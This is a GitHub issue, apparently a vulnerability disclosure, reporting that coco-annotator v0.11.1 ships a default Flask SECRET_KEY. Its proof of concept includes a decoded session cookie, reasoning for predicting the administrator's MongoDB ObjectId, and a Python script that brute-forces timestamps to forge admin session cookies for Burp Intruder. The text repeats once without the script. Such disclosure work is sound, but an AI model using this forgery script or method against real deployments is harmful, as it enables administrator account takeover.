You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The coco-annotator project has a default SECRET_KEY, which is used for signing and verifying Flask sessions. If the system administrator does not change the SECRET_KEY when configuring the system, it can lead to arbitrary session forgery by any user and gain administrative privileges.
Affected versions:
v0.11.1
Proof of concept
Step 1: Open http://x.x.x.x:5000/#/auth. Click on the "register" option.Enter the required information to register a new user(such as, coco/123456). If the account already exists, skip the registration and proceed to step 2 directly.
Step2: Log into the system and get the Set-Cookie header in the response. Here is a example.
Step 3: use the tool flask-session-cookie-manager( https://github.com/noraj/flask-session-cookie-manager) to decode the session and analyze the format of the session. python3 flask_session_cookie_manager3.py decode -c ".eJwlzksOwjAMANG7eN2FP3HqcBkUx7Zg29IV4u4gcYB5mjfc68jzAbfXceUG92fADcJ8YR_NV9ooMzd0b-xYTL6KkoJkZ95thGHXkDYJp-Dk4WKFg6dniRrlsr4n1QxF8sQMsmLzNijFpnfkkvmLjKb70sayAja4zjz-M73_mJI2VJYqIroKSWf4fAE3ojSz.Zlgfkg.APoV6-pcsJ68eOGMsIiHF4OdOYk"
The decode result of session is as following: b'{"_fresh":true,"_id":"d8bc0694bce89f88b80bb42b0f21bcf1e1d13722789d8065d34a10a30a29b38f092abef3581ec867e1fad501be0ed18f28b491e38ab602f3ab3881abbc5423cd","user_id":"66581f34953c55000b531362"}'
Step 4: analyze the factors of user_id. The user_id is auto generated by mongodb, aka ObjectId. The rules of ObjectId can find on https://www.cnblogs.com/btgyoyo/p/7156589.html.
ObjectId is a 12-byte BSON type string. In byte order, it represents the following:
4 bytes: UNIX timestamp
3 bytes: Identifies the machine running MongoDB(fixed)
2 bytes: Represents the process that generated this _id(fixed, if no restarting)
3 bytes: A incrementing counter value starting from a random number. (can be calculated with new register user’s id and user counts)
Now, only the 4 bytes UNIX timestamp need be guessed. There is no need to guess from 1970, we can guess from now. The brute-force range for a day is 246060=86400. The brute-force range for a year is 3652460*60=31536000.
Thus, we can forge the session and become anyone(of course, I want to be administrator).
Step 5: send the following request and get the counts of the system users.
Step 6: By brute-forcing the user_id, one can forge a session. In coco-annotator, the first registered user is a super administrator. Based on the rule that last three bytes of user_id is a continuous counter, the last three bytes of the super administrator's user_id are 0x531362-4+1=0x53135f. If the default machine code and process remain unchanged, the last eight bytes of the super administrator's user_id are 953c55000b53135f. Then, by estimating the system's deployment time range, one can brute-force and generate a forged session. After testing, the id field in the session is meaningless and can be freely modified. The script for brute-forcing and generating the session is as follows:
# coding=utf-8
import time
import datetime
import subprocess
def call_script_and_write_output(user_id, output_file):
try:
# Construct the command with script name and arguments
command = "python3 flask_session_cookie_manager3.py encode -s \"RandomSecretKeyHere\" -t '{\"_fresh\":True,\"_id\":\"e5fc7a54a73246c3b956026a87e4687d6daca473c28d0719269540d604cbd7fc61e910b12ebc84477fb7b8d76c7bbccf64ad1a852ad1bf80e7bac4b2174aba5f\",\"user_id\":\"%s\"}'" % user_id
# Call the script and capture the output
print(command)
result = subprocess.getoutput(command)
print(result)
# Write the output to the file
with open(output_file, 'a+') as file:
file.write(result)
file.write("\n")
print(f"Output written to {output_file}")
except Exception as e:
print(f"An error occurred: {e}")
# 示例时间,可以根据需要修改
d_start = datetime.datetime(2024, 5, 29, 14, 30, 0)
d_end = datetime.datetime(2024, 5, 29, 15, 00, 0)
timestamp_start = int(time.mktime(d_start.timetuple()))
timestamp_end = int(time.mktime(d_end.timetuple()))
print(f"时间 {d_start} 转化为16进制时间戳为 {hex(timestamp_start)}")
print(f"时间 {d_end} 转化为16进制时间戳为 {hex(timestamp_end)}")
ss = "953c55000b53135f"
#for item in range(0x6656cc28, 0x6656cc29):
#for item in range(timestamp_start, timestamp_start+1):
for item in range(timestamp_start, timestamp_end):
user_id = hex(item)[2:] + ss
print(user_id)
call_script_and_write_output(user_id, "/Users/stone/sessions.txt")
Step 7: place the sessions in Intruder module of Burpsuite and brute-force the following request. The URL encoding must be disabled for session. When it response with status 200, it is the right forged session.
Step 8: send following request with forged session to check whether I am administrator. This interface can only be accessed by administrator. It response with all user’s information and I am administrator.
The text was updated successfully, but these errors were encountered:
gaogaostone
changed the title
Default SECRET_KEY can lead to can lead to arbitrary session forgery
Default SECRET_KEY can lead to arbitrary session forgery
Oct 12, 2024
The coco-annotator project has a default SECRET_KEY, which is used for signing and verifying Flask sessions. If the system administrator does not change the SECRET_KEY when configuring the system, it can lead to arbitrary session forgery by any user and gain administrative privileges.
Affected versions:
v0.11.1
Proof of concept
Step 1: Open http://x.x.x.x:5000/#/auth. Click on the "register" option.Enter the required information to register a new user(such as, coco/123456). If the account already exists, skip the registration and proceed to step 2 directly.
Step2: Log into the system and get the Set-Cookie header in the response. Here is a example.
Step 3: use the tool flask-session-cookie-manager( https://github.com/noraj/flask-session-cookie-manager) to decode the session and analyze the format of the session.
python3 flask_session_cookie_manager3.py decode -c ".eJwlzksOwjAMANG7eN2FP3HqcBkUx7Zg29IV4u4gcYB5mjfc68jzAbfXceUG92fADcJ8YR_NV9ooMzd0b-xYTL6KkoJkZ95thGHXkDYJp-Dk4WKFg6dniRrlsr4n1QxF8sQMsmLzNijFpnfkkvmLjKb70sayAja4zjz-M73_mJI2VJYqIroKSWf4fAE3ojSz.Zlgfkg.APoV6-pcsJ68eOGMsIiHF4OdOYk"
The decode result of session is as following:
b'{"_fresh":true,"_id":"d8bc0694bce89f88b80bb42b0f21bcf1e1d13722789d8065d34a10a30a29b38f092abef3581ec867e1fad501be0ed18f28b491e38ab602f3ab3881abbc5423cd","user_id":"66581f34953c55000b531362"}'
Step 4: analyze the factors of user_id. The user_id is auto generated by mongodb, aka ObjectId. The rules of ObjectId can find on https://www.cnblogs.com/btgyoyo/p/7156589.html.
ObjectId is a 12-byte BSON type string. In byte order, it represents the following:
4 bytes: UNIX timestamp
3 bytes: Identifies the machine running MongoDB(fixed)
2 bytes: Represents the process that generated this _id(fixed, if no restarting)
3 bytes: A incrementing counter value starting from a random number. (can be calculated with new register user’s id and user counts)
Now, only the 4 bytes UNIX timestamp need be guessed. There is no need to guess from 1970, we can guess from now. The brute-force range for a day is 246060=86400. The brute-force range for a year is 3652460*60=31536000.
Thus, we can forge the session and become anyone(of course, I want to be administrator).
Step 5: send the following request and get the counts of the system users.
Step 6: By brute-forcing the user_id, one can forge a session. In coco-annotator, the first registered user is a super administrator. Based on the rule that last three bytes of user_id is a continuous counter, the last three bytes of the super administrator's user_id are 0x531362-4+1=0x53135f. If the default machine code and process remain unchanged, the last eight bytes of the super administrator's user_id are 953c55000b53135f. Then, by estimating the system's deployment time range, one can brute-force and generate a forged session. After testing, the id field in the session is meaningless and can be freely modified. The script for brute-forcing and generating the session is as follows:
Step 7: place the sessions in Intruder module of Burpsuite and brute-force the following request. The URL encoding must be disabled for session. When it response with status 200, it is the right forged session.
Step 8: send following request with forged session to check whether I am administrator. This interface can only be accessed by administrator. It response with all user’s information and I am administrator.
The text was updated successfully, but these errors were encountered: